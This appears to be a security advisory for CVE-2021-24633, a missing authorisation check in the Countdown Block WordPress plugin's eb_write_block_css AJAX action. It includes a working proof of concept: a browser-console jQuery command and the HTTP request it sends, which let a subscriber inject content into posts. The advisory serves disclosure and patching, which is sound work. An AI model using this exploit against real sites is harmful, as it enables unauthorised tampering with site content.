Countdown Block < 1.1.2 – Missing Authorisation in AJAX action | CVE 2021-24633

Description

The plugin does not have authorisation in the eb_write_block_css AJAX action, which allows any authenticated user, such as Subscriber, to modify post contents displayed to users.

v1.1.1 attempt to fix the issue was incomplete, still allowing it to be exploited via a CSRF attack on an admin due to a logic flaw.

Proof of Concept

Login as any user, such as a subscriber, and execute the below command via the Web Developer console (replacing the POST_ID by the post id to add the content to)

jQuery.post(ajaxurl,{action:"eb_write_block_css",id:POST_ID,data:JSON.stringify([{desktop:"p:before{content:'This content was added by a subscriber!';}"}])})

Which will send the following request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Connection: close
Cookie: [any authenticated user]

action=eb_write_block_css&id=1422&data=%5B%7B%22desktop%22%3A%22p%3Abefore%7Bcontent%3A'This+content+was+added+by+a+subscriber!'%3B%7D%22%7D%5D

Then view the related post, which will have the text 'This content was added by a subscriber!' appended before each paragraph